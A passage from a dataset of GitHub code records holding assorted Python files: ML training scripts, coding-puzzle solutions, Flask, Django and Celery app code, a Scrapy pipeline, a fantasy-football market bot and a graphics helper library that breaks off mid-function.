writer.add_scalar('Train/CV_Loss', cv_loss, global_step)\r\n # net.train()\r\n global_time = 0\r\n sum_loss = 0\r\n global_time += 1\r\n global_step += 1\r\n # if global_step % 100 == 0 and global_step != 0:\r\n # save_model(net, optimizer, loss, models_path=MODEL_STORE + 'middle_store/model_' + str(i) + '_' + str(global_step // 1000) +'.pkl')\r\n cv_loss = validation(net, VALIDATION_DATA_PATH, 1)\r\n writer.add_scalar('Train/CV_Loss', cv_loss, global_step)\r\n net.train()\r\n save_model(net, optimizer, cv_loss, models_path=MODEL_STORE + 'model_' + str(i) + '.pkl')\r\n bar.finish()\r\n\r\n\r\nglobal_step = 0\r\nglobal_time = 0\r\n\r\nif __name__ == \"__main__\":\r\n # 初始化训练集\r\n train_data_set = SpeechDataset(TRAIN_DATA_PATH)\r\n train_data_loader = DataLoader(dataset=train_data_set,\r\n batch_size=TRAIN_BATCH_SIZE,\r\n shuffle=True,\r\n collate_fn=collate,\r\n num_workers=8,\r\n pin_memory=True\r\n )\r\n NET = Net()\r\n NET = NET.cuda(CUDA_ID[0])\r\n NET = nn.DataParallel(NET)\r\n # optimizer,loss=resume_model(NET, MODEL_STORE + '/model_2.pkl')\r\n train_optimizer = optim.Adam(NET.parameters(), lr=LR)\r\n # train_optimizer.load_state_dict(optimizer)\r\n # train_optimizer.param_groups[0]['lr'] = LR\r\n train(NET, EPOCH, train_data_loader, train_optimizer)\r\n","repo_name":"YingMa-cc/speech-enhancement-of-FM-speech","sub_path":"FM_enhancement/train/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6222253769","text":"class Solution:\n # @return a list of strings, [s1, s2]\n def letterCombinations(self, digits):\n a = [ [], [], ['a', 'b', 'c' ], [ 'd', 'e', 'f' ], [ 'g', 'h', 'i'], [ 'j', 'k', 'l' ], [ 'm', 'n', 'o' ], [ 'p', 'q', 'r', 's' ], [ 't', 'u', 'v' ], [ 'w', 'x', 'y', 'z' ] ]\n res = [ '' ]\n for d in digits:\n k = int(d)\n tmp = []\n for word in res:\n for w in a[k]:\n tmp.append(word + w)\n res = tmp\n return res","repo_name":"Shuaiyicao/leetcode-python","sub_path":"17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26897163438","text":"from typing import List\nimport heapq\n\ndef minInterval(intervals: List[List[int]], queries: List[int]) -> List[int]:\n intervals.sort()\n minHeap = []\n res = {}\n i = 0\n for q in sorted(queries):\n while i < len(intervals) and intervals[i][0] <= q:\n l, r = intervals[i]\n heapq.heappush(minHeap, (r - l + 1, r))\n i += 1\n\n while minHeap and minHeap[0][1] < q:\n heapq.heappop(minHeap)\n res[q] = minHeap[0][0] if minHeap else -1\n return [res[q] for q in queries]\n\nintervals = [[1,4],[2,4],[3,6],[4,4]]\nqueries = [2,3,4,5]\nprint(minInterval(intervals, queries))\n\nintervals = [[2,3],[2,5],[1,8],[20,25]]\nqueries = [2,19,5,22]\nprint(minInterval(intervals, queries))\n\n\"\"\"\nこのコードは、指定されたクエリポイントごとに最小の区間を見つけ、その区間の長さを返す関数`minInterval`を定義しています。\n\n大まかな説明:\n- 与えられた区間をスタートの時点でソートします。\n- クエリもソートして処理します。\n- クエリの各ポイントについて、それを含む可能性のあるすべての区間をミニマムヒープに追加します。\n- 現在のクエリポイントよりも早く終わる区間はヒープから削除します。\n- 最小の区間はヒープのトップにあります。\n- 各クエリの結果を辞書で保存し、最後に指定されたクエリの順序で結果を返します。\n\n部分毎の説明:\n\n1. `intervals.sort()`\n - 区間をスタート時点でソートします。\n\n2. `minHeap = []`\n - ミニマムヒープを初期化します。\n\n3. `res = {}`\n - 各クエリの結果を保存するための辞書を初期化します。\n\n4. `i = 0`\n - 現在の区間のインデックスを初期化します。\n\n5. `for q in sorted(queries):`\n - ソートされたクエリに対して反復処理を行います。\n\n6. `while i < len(intervals) and intervals[i][0] <= q:`\n - 現在のクエリポイントをカバーする可能性のあるす��ての区間をヒープに追加します。\n\n7. `heapq.heappush(minHeap, (r - l + 1, r))`\n - 区間の長さと終了時点をヒープに追加します。区間の長さは優先的にヒープの順序付けのために使われます。\n\n8. `while minHeap and minHeap[0][1] < q:`\n - 現在のクエリポイントよりも前に終了する区間は、もはや考慮する必要がないのでヒープから削除します。\n\n9. `res[q] = minHeap[0][0] if minHeap else -1`\n - クエリポイントに一致する最小の区間の長さを辞書に保存します。ヒープが空の場合は-1を保存します。\n\n10. `return [res[q] for q in queries]`\n - 最後に、指定されたクエリの順序で結果をリストとして返します。\n\nこの関数は、各クエリポイントに対して最小の区間の長さを高速に見つけるのに役立ちます。\n\"\"\"","repo_name":"majikojima/neetcode","sub_path":"16_Intervals/04_MinimumIntervalToIncludeEachQuery.py","file_name":"04_MinimumIntervalToIncludeEachQuery.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26903328854","text":"from __future__ import absolute_import, unicode_literals\n\nimport sys\n\nfrom celery import Celery\nimport os\n# from note import tasks\nsys.path.append(os.path.abspath('vm_bm_test'))\n# set the default Django settings module for the 'celery' program.\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'vm_bm_test.settings')\n\napp = Celery('vm_bm_test')\n# app.config_from_object('django.conf:settings', namespace='CELERY')\napp.autodiscover_tasks(lambda: settings.INSTALLED_APPS)\napp.conf.beat_schedule = {\n 'add-every-30-seconds': {\n 'task': 'vm_bm.tasks.json_adaptor_process',\n 'schedule': 30.0,\n },\n}\n# from __future__ import absolute_import\n# import os\n# from celery import Celery\n# from django.conf import settings\n# os.environ.setdefault('DJANGO_SETTINGS_MODULE','vm_bm_test.settings')\n# app = Celery('vm_bm_test')\n# app.config_from_object('django.conf:settings')\n# app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)","repo_name":"mdhussain7/md_vm_bm_check","sub_path":"vm_bm_test/celery.py","file_name":"celery.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24866463497","text":"from flask import Flask,request, url_for, redirect, render_template\r\nimport pickle\r\nimport numpy as np\r\nimport os\r\nfrom jinja2 import debug\r\n\r\napp = Flask(__name__)\r\n\r\nmodel = pickle.load(open('model.pkl','rb'))\r\n\r\n@app.route('/')\r\ndef saludo():\r\n return render_template('tempplates/indice.html')\r\n\r\n@app.route('/predict', methods=['POST','GET'])\r\ndef predecir():\r\n int_features = [int(x) for x in request.form.values()]\r\n final =[np.array(int_features)]\r\n print(int_features)\r\n print(final)\r\n prediccion = model.predict_proba(final)\r\n salida = '{0:.{1}f}'.format(prediccion[0][1],2)\r\n print(\"Cantidad pred: \",salida)\r\n\r\n #{1}f a no olvidar significa un numero despues de la coma\r\n\r\n if salida > str (0.5):\r\n return render_template('indice.html', pred= 'El bosque se encuentra en peligro.\\nLas Probabilidades de que ocurra un incendio es de {}'.format(salida), bhai=\"Hay algo por hacer ahora?\")\r\n else:\r\n return render_template('indice.html', pred= 'El bosque se encuentra a salvo.\\nLas Probabilidades de que ocurra un incendio es de {}'.format(salida), bhai=\"Todo se encuentra sano y salvo\")\r\n\r\nif __name__ == '__main__':\r\n port = int(os.environ.get('PORT', 5000))\r\n app.run(host='0.0.0.0', port=port)","repo_name":"AlfredMoller/forest_ml","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5938286677","text":"'''March 27th 2019\nScript to preprocess raw data.\nThe option make_processed_files takes the downloaded files and\naccumulates spikes, angles and state information into a single\nPython friendly structure.\nThe option make_rates takes the file generated by make_processed_files\nand computes rate estimates from the spike timings.\n'''\n\nfrom __future__ import division\nimport numpy as np\nimport numpy.linalg as la\nimport sys, os\nimport time, datetime\nimport pandas as pd\nimport re\n\ngen_fn_dir = os.path.abspath('..') + '/shared_scripts'\nsys.path.append(gen_fn_dir)\nimport general_file_fns as gff\nimport data_read_fns as drf\nimport rate_functions as rf\n\n\ndef is_session(fname):\n p = re.compile(r'Mouse\\d\\d-\\d\\d\\d\\d\\d\\d$')\n result = True if p.match(fname) else False\n return result\n\n\n# Paths to save the data are in this dict. If you haven't already, edit\n# general_params/make_general_params_file.py to set the paths you want\n# and run it to generate general_params.p\n\n\ngen_params = gff.load_pickle_file('../general_params/general_params.p')\nmake_processed_files = False\nmake_rates = False\nprint_rates_data = False\nprint_preprocessed_data = True\n\n\ndata_path = gen_params['raw_data_dir'] + '/'\nfolder_list = os.listdir(data_path)\nprint(folder_list)\nsession_list = [x for x in folder_list if is_session(x)]\nprint(session_list)\n\n\nif make_processed_files:\n for session in session_list:\n data_path = gen_params['raw_data_dir'] + session + '/'\n params = {'session': session, 'data_path': data_path,\n 'eeg_sampling_rate': 1250., 'spike_sampling_interval': 1.0 / 20e3}\n if os.path.isfile(gen_params['processed_data_dir'] + '%s.p' % session): # preprocessing 중복 방지(시간 절약)\n continue\n print(session)\n data = drf.gather_session_spike_info(params)\n save_dir = gff.return_dir(gen_params['processed_data_dir'])\n gff.save_pickle_file(data, save_dir + '%s.p' % session)\n\nif make_rates:\n for session in session_list:\n print('Getting kernel rates for ' + session)\n t0 = time.time()\n sigma = 0.1\n params = {'dt': 0.05, 'method': 'gaussian', 'sigma': sigma} # Parameter time_interval=50ms\n save_dir = gff.return_dir(\n gen_params['kernel_rates_dir'] + '%0.0fms_sigma/' % (sigma * 1000))\n\n inp_data = gff.load_pickle_file(gen_params['processed_data_dir'] +\n '%s.p' % session)\n\n rates = rf.get_rates_and_angles_by_interval(inp_data, params, smooth_type='kernel',\n just_wake=True)\n\n gff.save_pickle_file(rates, save_dir + '%s.p' % session)\n print('Time ', time.time() - t0)\n\nif print_rates_data:\n sys.stdout = open('preprocess_rates.txt', 'w')\n for session in session_list:\n print(\"**************************************************************************\")\n print('Printing Wake kernel rates data ' + session)\n sigma = 0.1\n inp_data = gff.load_pickle_file(gen_params['kernel_rates_dir'] +\n '%0.0fms_sigma/' % (sigma * 1000) + '%s.p' % session)\n states = inp_data.keys()\n # print(states)\n for state in states:\n if state == \"Wake\":\n for tmp_interval in inp_data[\"Wake\"]:\n interval = tuple(tmp_interval)\n print(inp_data[state][interval].keys())\n print(\" State: \", state, \"\\n\", \"Interval: \", interval)\n print(\"RATES: \")\n kernel_rates = pd.DataFrame.from_dict(inp_data[state][interval]['rates'], orient='index')\n print(kernel_rates)\n print(\"_______________________________________________________________________\")\n rate_times = pd.DataFrame.from_dict(inp_data[state][interval]['rate_times'])\n print(rate_times)\n print(\"_______________________________________________________________________\")\n print(\"ANGLES: \")\n angles = pd.DataFrame.from_dict(inp_data[state][interval]['angles'])\n print(angles)\n print(\"_______________________________________________________________________\")\n print(\"ANGLE_TIMES: \")\n angle_times = pd.DataFrame.from_dict(inp_data[state][interval]['angle_times'])\n\n sys.stdout.close()\n\nif print_preprocessed_data:\n # sys.stdout = open('processed.txt', 'w')\n for session in session_list:\n print(\"**************************************************************************\")\n print(\"Printing Processed data \" + session)\n processed_data = gff.load_pickle_file(gen_params['processed_data_dir'] + '%s.p' % session)\n print(processed_data.keys())\n print(processed_data['pos_sampling_rate'])\n print(\"\\n\")\n # sys.stdout.close()\n","repo_name":"justin1228/manifold-with-VAEs","sub_path":"read_in_data/preprocess_raw_data.py","file_name":"preprocess_raw_data.py","file_ext":"py","file_size_in_byte":4955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19719786139","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render\nfrom django.http import JsonResponse\nfrom produtos.models.produtos import Produtos\nfrom loja.controller import subcategorias_por_menu,buscar_quantidade_produtos_por_marca\nimport json\n\ndef categoria_loja (request):\n if request.method == 'GET': \n return render(request,'categoria.html') \n \n elif request.method == \"POST\" :\n data = json.loads(request.body.decode('utf-8'))\n print(data)\n marcas_dict=buscar_quantidade_produtos_por_marca()\n subcategorias=subcategorias_por_menu(data['idMenu'])\n if data['idMenu']:\n produtos = [produto for produto in Produtos.objects.all() if produto.categoria_fk.menu.id == int(data['idMenu'])]\n produtos_dict = [produto.to_dict() for produto in produtos]\n else:\n produtos = [produto for produto in Produtos.objects.all()]\n produtos_dict = [produto.to_dict() for produto in produtos]\n return JsonResponse({'status': produtos_dict,\n 'subcategorias':subcategorias,\n 'marcas':marcas_dict})\n \n\n","repo_name":"edsontomas1981/GDSPORTSNOVO","sub_path":"loja/views/categoria_loja.py","file_name":"categoria_loja.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9735622419","text":"\"\"\"JSON/RESTful API that will support a variety of Angularjs apps to\nsupport the education market in Singapore.\n\n\"\"\"\nimport os.path\n\nfrom google.appengine.api import lib_config\n\n__all__ = ['config']\n\n\nclass _ConfigDefaults(object):\n USERS_ARE_ADMIN = False\n LOGIN_URL = '/api/login'\n LOGOUT_URL = '/api/logout'\n OAUTH_CALLBACK_URL = '/api/oauth2callback'\n OAUTH_SECRET_PATH_PATTERN = os.path.join(\n os.path.dirname(__file__), '../../secrets/%s_client.json'\n )\n OAUTH_SCOPES = [\n 'https://www.googleapis.com/auth/userinfo.email',\n 'https://www.googleapis.com/auth/userinfo.profile'\n ]\n OAUTH_SERVICE_ACCOUNT_SECRET_PATH_PATTERN = os.path.join(\n os.path.dirname(__file__), '../../secrets/%s_service_account.json'\n )\n OAUTH_SERVICE_ACCOUNT_SCOPES = [\n 'https://www.googleapis.com/auth/admin.directory.user.readonly'\n ]\n VALID_DOMAINS = {'example.com': 'admin@example.com'}\n DEFAULT_RETURN_URL = '/dashboard/'\n UPLOAD_CB_URL = '/api/v1/dashboard/students/_upload'\n PHOTO_CB_URL = '/api/v1/dashboard/students/_uploadprofile'\n\n\nconfig = lib_config.register('educationcore', _ConfigDefaults.__dict__)\n","repo_name":"gayancliyanage/education","sub_path":"src/education/core/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"11554304524","text":"# https://www.acmicpc.net/problem/2231\n\nimport sys\n\nN = sys.stdin.readline()\n\nresult = 0\n\nmax_int = int(N[0]) - 1 + 9 * (len(N) - 2)\n\nfor i in range(max_int, 0, -1):\n check = int(N) - i\n\n if i == sum(list(map(int, str(check)))):\n result = check\n\n break\n\nprint(result)","repo_name":"Gnoyh/baekjoon-python","sub_path":"baekjoon_2231.py","file_name":"baekjoon_2231.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28727705744","text":"# For this workflow to to run, you need the following;\n# transformers[torch]==4.18.0\n# relevance-workflows-core\n\nimport uuid\nimport torch\n\nfrom typing import Callable, List, Optional\n\nfrom transformers import pipeline\nfrom ai_transform.api.client import Client\nfrom ai_transform.engine.stable_engine import StableEngine\nfrom ai_transform.workflow.helpers import decode_workflow_token\nfrom ai_transform.workflow.abstract_workflow import AbstractWorkflow\nfrom ai_transform.operator.abstract_operator import AbstractOperator\nfrom ai_transform.utils.example_documents import DocumentList\n\n\nclass EmotionOperator(AbstractOperator):\n def __init__(\n self,\n text_field: str,\n model: str = \"Emanuel/bertweet-emotion-base\",\n alias: Optional[str] = None,\n min_score: float = 0.1,\n ):\n device = 0 if torch.cuda.is_available() else -1\n self._model = pipeline(\"sentiment-analysis\", model=model, device=device, return_all_scores=True)\n\n self._text_field = text_field\n self._alias = model.replace(\"/\", \"-\") if alias is None else alias\n self._output_field = f\"_emotion_.{text_field}.{self._alias}\"\n self._min_score = min_score\n\n super().__init__(\n input_fields=[text_field], output_fields=[f\"{self._output_field}.label\", f\"{self._output_field}.score\"]\n )\n\n def transform(self, documents: DocumentList) -> DocumentList:\n \"\"\"\n Main transform function\n \"\"\"\n\n batch = [document[self._text_field] for document in documents]\n labels = self._model(batch)\n\n for index in range(len(labels)):\n _labels = labels[index]\n _label = max(_labels, key=lambda logit: logit[\"score\"])\n\n score = _label[\"score\"]\n if score < self._min_score:\n emotion = dict(label=\"No emotion detected\")\n\n else:\n label = _label[\"label\"]\n emotion = dict(label=label, score=score)\n\n documents[index][self._output_field] = emotion\n\n return documents\n\n\ndef execute(token: str, logger: Callable, worker_number: int = 0, *args, **kwargs):\n config = decode_workflow_token(token)\n\n job_id = config.get(\"job_id\", str(uuid.uuid4()))\n token = config[\"authorizationToken\"]\n dataset_id = config[\"dataset_id\"]\n text_fields: list = config[\"text_fields\"]\n model: str = config.get(\"model_id\", \"Emanuel/bertweet-emotion-base\")\n alias: list = config.get(\"alias\", None)\n min_score = float(config.get(\"min_score\", 0.1))\n filters: list = config.get(\"filters\", [])\n chunksize: int = 8\n total_workers: int = total_workers\n\n alias = config.get(\"alias\", None)\n\n client = Client(token=token)\n dataset = client.Dataset(dataset_id)\n\n operator = EmotionOperator(text_field=text_fields[0], model=model, alias=alias, min_score=min_score)\n\n filters = dataset[text_fields[0]].exists()\n\n engine = StableEngine(\n dataset=dataset,\n operator=operator,\n chunksize=chunksize,\n select_fields=text_fields,\n filters=filters,\n worker_number=worker_number,\n total_workers=total_workers,\n )\n\n workflow = AbstractWorkflow(engine=engine, job_id=job_id)\n workflow.run()\n\n field_children = dataset.list_field_children()[\"results\"]\n assert field_children[0][\"field\"] == text_fields[0]\n assert field_children[0][\"field_children\"][0] == operator.output_fields[0]\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(description=\"Emotion workflow.\")\n parser.add_argument(\n \"token\", type=str, help=\"a base64 encoded token that contains parameters for running the workflow\"\n )\n args = parser.parse_args()\n execute(args.token, print)\n","repo_name":"RelevanceAI/ai-transform","sub_path":"examples/workflows/emotion_example.py","file_name":"emotion_example.py","file_ext":"py","file_size_in_byte":3763,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"36430674075","text":"import random\nimport unidecode\n\n\nclass File():\n\n def __init__(self, path) -> None:\n self.path = path\n self.num_lines = 0\n self.__file_lines = []\n self.__load_file(self.path)\n self.__prev_index = -1\n\n\n def __load_file(self, path):\n\n with open(path, 'r', encoding='utf-8') as f:\n\n self.__file_lines = [unidecode.unidecode(line.strip().lower()) for line in f]\n\n self.num_lines = len(self.__file_lines)\n\n\n def get_random_line(self):\n\n try:\n random_index = random.randint(0, self.num_lines - 1)\n\n if self.__prev_index != random_index:\n\n self.__prev_index = random_index\n return self.__file_lines[random_index] \n \n else:\n self.get_random_line(self)\n \n except ValueError:\n\n print('The file has not been loaded or does not contain any line')\n\n\nif __name__ == '__main__':\n pass","repo_name":"fraboto/Data-Science-Study","sub_path":"InterPython/hangman/utils/file_utils.py","file_name":"file_utils.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8753382433","text":"\"\"\"In Jypiter Notebook\n%%writefile myfile.txt\nhello this is content of my file\n\nTo open file in read write append and close \n\"\"\"\n\n\"\"\"METHOD 1\"\"\"\n\nmyfile=open('NewTextFile.txt',mode='r')\nprint(myfile.read())\nmyfile.close()\n\"\"\"It is important to close open file to execute error free problems. \nhere in method one To read file content we opened file in Read mode.\nAnd once file is read cursor is at end of file content \nNote:- If we want to read file more than one time before closing it then we need to seek cursor at 0 to read content from start of file\n\"\"\"\nmyfile=open('NewTextFile.txt',mode='r')\nprint(myfile.read())\nmyfile.seek(0)\nContentasList=myfile.readlines()\nprint(ContentasList)\nmyfile.close()\n\n\"\"\"\n.readlines convert every content of line in file as list objects\n\"\"\"\nmyfile=open('NewTextFile.txt',mode='w')\nmyfile.write('This content are being written as mode is w and this content of file is going to be override / this file is going to be created if this file does not exist')\nmyfile.close()\n\nmyfile=open('NewTextFile.txt',mode='a')\nmyfile.write('\\n \\n This content are being appended by mode a')\nmyfile.close()\n\n\"\"\"METHOD 2 \"\"\"\n\nwith open('NewTextFile.txt',mode='r') as myfile:\n\tprint(myfile.read())\nwith open('NewTextFile.txt',mode='w') as myfile:\n\tmyfile.write('Content are being override/created')\n\n\"\"\"Note:- Method 2 is commonly followed because we need not always write close() to close file with open do it for us \"\"\"\n","repo_name":"mjzaid921pccoer/MyUdemyPython","sub_path":"5_files.py","file_name":"5_files.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7037046702","text":"import json\nimport requests\nfrom scrapy import log\n\n\nclass OxygenPipeline(object):\n\n def process_item(self, item, spider):\n if self.is_data_valid(item):\n data = dict(item)\n data[\"__type__\"] = \"Product\"\n r = requests.put(\n \"http://127.0.0.1:5000/rest/products/\", data=json.dumps(data),\n headers={\"content-type\": \"application/json\"})\n log.msg(\"Result \" + r.content, level=log.INFO)\n else:\n log.msg(\"Data invalid \" + item[\"code\"], level=log.WARNING)\n return item\n\n def is_data_valid(self, item):\n is_valid = True\n if not item[\"description\"]:\n is_valid = False\n if not item[\"designer\"]:\n is_valid = False\n if item[\"price\"] == 0:\n is_valid = False\n if not item[\"image_urls\"]:\n is_valid = False\n if not item[\"name\"]:\n is_valid = False\n if not item[\"stock_status\"]:\n is_valid = False\n return is_valid\n","repo_name":"lukasz-madon/product-scraper","sub_path":"oxygen/oxygen/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"36024607753","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# This program is dedicated to the public domain under the CC0 license.\n#\n# THIS EXAMPLE HAS BEEN UPDATED TO WORK WITH THE BETA VERSION 12 OF PYTHON-TELEGRAM-BOT.\n# If you're still using version 11.1.0, please see the examples at\n# https://github.com/python-telegram-bot/python-telegram-bot/tree/v11.1.0/examples\n\n\"\"\"\nSimple Bot to reply to Telegram messages.\n\nFirst, a few handler functions are defined. Then, those functions are passed to\nthe Dispatcher and registered at their respective places.\nThen, the bot is started and runs until we press Ctrl-C on the command line.\n\nUsage:\nBasic Echobot example, repeats messages.\nPress Ctrl-C on the command line or send a signal to the process to stop the\nbot.\n\"\"\"\n\nimport logging, requests, re, json\n\n# Enable logging\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\nurl_login = 'https://biwenger.as.com/api/v2/auth/login'\nurl_account = 'https://biwenger.as.com/api/v2/account'\nurl_players_market = 'https://biwenger.as.com/api/v2/user?fields=players(id,owner),market(*,-userID),-trophies'\nurl_players_league = 'https://biwenger.as.com/api/v2/players/la-liga/'\nurl_retire_market = \"https://biwenger.as.com/api/v2/market?player=\"\nurl_add_player_market = \"https://biwenger.as.com/api/v2/market\"\n\n\ndef main():\n username = \"S\"\n password = \"\"\n percentage = 80\n\n # login process\n token = login(username, password)\n logger.info(\"token: \" + token)\n\n # getting account info needed to the future calls headers\n account_info = account(token)\n logger.info(\"contents: \" + repr(account_info))\n id_account = account_info['data']['account']['id']\n logger.info(\"id: \" + repr(id_account))\n id_league = account_info['data']['leagues'][0]['id']\n logger.info(\"league: \" + repr(id_league))\n id_user = account_info['data']['leagues'][0]['user']['id']\n logger.info(\"user: \" + repr(id_user))\n\n # get player info\n players_info = players(token, id_league, id_user)\n logger.info(\"list players info: \" + repr(players_info))\n\n if \"error\" in players_info:\n logger.info(\"error calling list_players!\" + players_info)\n else:\n players_market = players_info['data']['market']\n logger.info(\"list players market: \" + repr(players_market))\n list_players = players_info['data']['players']\n logger.info(\"list players: \" + repr(list_players))\n\n logger.info(\"--actions with players info--\")\n # get and set players into market\n for player in list_players:\n auth = 'Bearer ' + token\n headers = {'Content-type': 'application/json', 'Accept': 'application/json, text/plain, */*',\n 'X-Lang': 'es', 'X-League': repr(id_league), 'X-User': repr(id_user), 'Authorization': auth}\n player_info = requests.get(url_players_league + repr(player['id']), headers=headers).json()['data']\n logger.info(\"name: \" + player_info['name'] + \"; price=\" + repr(\n player_info['price']))\n if is_player_in_market(player['id'], players_market):\n # logger.info(\"jugador: \" + repr(jugador['id']) + \" ;precio real:\" + repr(jugador[\"owner\"][\"price\"]) + \" ;precio mercado:\" + repr(jugadorMercado[\"price\"]))\n result = requests.delete(url_retire_market + repr(player['id']), headers=headers)\n logger.info(\"result delete: \" + repr(result))\n\n data_add = {\"type\": \"sell\", \"player\": repr(player['id']),\n \"price\": repr(int(player_info['price'] + ((player_info['price'] * percentage) / 100)))}\n result = requests.post(url_add_player_market, data=json.dumps(data_add), headers=headers)\n logger.info(\"result player in market: \" + repr(result))\n else:\n data_add = {\"type\": \"sell\", \"player\": repr(player['id']),\n \"price\": repr(int(player_info['price'] + ((player_info['price'] * percentage) / 100)))}\n result = requests.post(url_add_player_market, data=json.dumps(data_add), headers=headers)\n logger.info(\"result player: \" + repr(result))\n\n if result['status'] == 200 or result['status'] == 204:\n logger.info(\"call ok!\")\n else:\n logger.info(\"error in call, staus: \" + str(result['status']))\n break\n\n\ndef login(username, password):\n logger.info(\"Login process\")\n data = {\"email\": username, \"password\": password}\n headers = {'Content-type': 'application/json', 'Accept': 'application/json, text/plain, */*'}\n contents = requests.post(url_login, data=json.dumps(data), headers=headers).json()\n logger.info(\"contents: \" + repr(contents))\n if \"token\" in contents:\n logger.info(\"call login ok!\")\n return contents['token']\n else:\n logger.info(\"error in login call, status: \" + contents['status'])\n return \"error, status\" + contents['status']\n\n\ndef account(token):\n auth = 'Bearer ' + token\n headers = {'Content-type': 'application/json', 'Accept': 'application/json, text/plain, */*', 'X-Lang': 'es',\n 'Authorization': auth}\n result = requests.get(url_account, headers=headers).json()\n if result['status'] == 200:\n logger.info(\"call login ok!\")\n return result\n else:\n logger.info(\"error in account call, status: \" + str(result['status']))\n return \"error, status\" + str(result['status'])\n\n\ndef players(token, league, user):\n auth = 'Bearer ' + token\n headers = {'Content-type': 'application/json', 'Accept': 'application/json, text/plain, */*', 'X-Lang': 'es',\n 'X-League': repr(league), 'X-User': repr(user), 'Authorization': auth}\n result = requests.get(url_players_market, headers=headers).json()\n if result['status'] == 200:\n logger.info(\"call login ok!\")\n return result\n else:\n logger.info(\"error in account call, result: \" + str(result))\n return \"error, status\" + str(result['status'])\n\n\ndef is_player_in_market(id_player, players_market):\n player_in_market = False\n for player_market in players_market:\n if id_player == player_market['playerID']:\n return True\n break\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jroigfer/biwenger-bot","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17802940554","text":"import torch.nn as nn\n\n\n# model\nclass LSTM(nn.Module):\n def __init__(self, in_dim=12, hidden_dim=10, output_dim=12, n_layer=1):\n super(LSTM, self).__init__()\n self.in_dim = in_dim\n self.hidden_dim = hidden_dim\n self.output_dim = output_dim\n self.n_layer = n_layer\n self.lstm = nn.LSTM(input_size=in_dim, hidden_size=hidden_dim, num_layers=n_layer, batch_first=True)\n self.linear = nn.Linear(hidden_dim, output_dim)\n\n def forward(self, x):\n _, (h_out, _) = self.lstm(x) # h_out是序列最后一个元素的hidden state\n h_out = h_out.view(h_out.shape[0], -1)\n h_out = self.linear(h_out)\n return h_out\n\nlstm_paras = {'epoch': 700,\n 'learning_rate': 0.001,\n 'seq_length': 4,\n 'n_feature': 12,\n 'divide_ratio': 0.7\n }\n","repo_name":"TymonXie/tymon","sub_path":"tymon/model_hub/time_series/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"} +{"seq_id":"72111756327","text":"# Libreria personalizada de funciones graficas\nimport math\nimport numpy as np\n\n\ndef matrixToCartessian(matrix_points, width, height):\n\tcartessian_points = []\n\tfor point in matrix_points:\n\t\tx = point[0] - width/2 # x = x' - Cw/2\n\t\ty = -point[1] + height/2 # y = Ch/2 + y\n\t\tcartessian_points.append((int(x), int(y)))\n\treturn cartessian_points\n\n\ndef pointAround(canvas, x, y, canvas_size, color):\n\tfor i in range(0, 5):\n\t\tif x-i >= 0:\n\t\t\tcanvas.putpixel((x-i, y), color)\n\t\t\n\t\tif x+i <= canvas_size[0]:\n\t\t\tcanvas.putpixel((x+i, y), color)\n\n\t\tif y-i >= 0:\n\t\t\tcanvas.putpixel((x, y-i), color)\n\t\t\n\t\tif x+i <= canvas_size[1]:\n\t\t\tcanvas.putpixel((x, y+i), color)\n\t\n\ndef drawPoint(x,y,color,canvas):\n\twidth, height = canvas.size\n\txn=int(width/2+x)\n\tyn=int(height/2-y)\n\tcanvas.putpixel((xn, yn),color)\n\n\ndef swap(P0,P1):\n\treturn P1, P0\n\n\ndef interpolate(i0,d0,i1,d1):\n\tif i0 == i1:\n\t\treturn [d0 for i in range(i0,i1+1)]\n\t\n\tvalues = []\n\ta = (d1 - d0) / (i1 - i0)\n\td = d0\n\tfor i in range(i0, i1+1):\n\t\tvalues.append(d)\n\t\td = d + a\n\treturn values\n\n\ndef drawLine(P0,P1,color,canvas):\n\tx0=P0[0]\n\ty0=P0[1]\n\tx1=P1[0]\n\ty1=P1[1]\n\tif 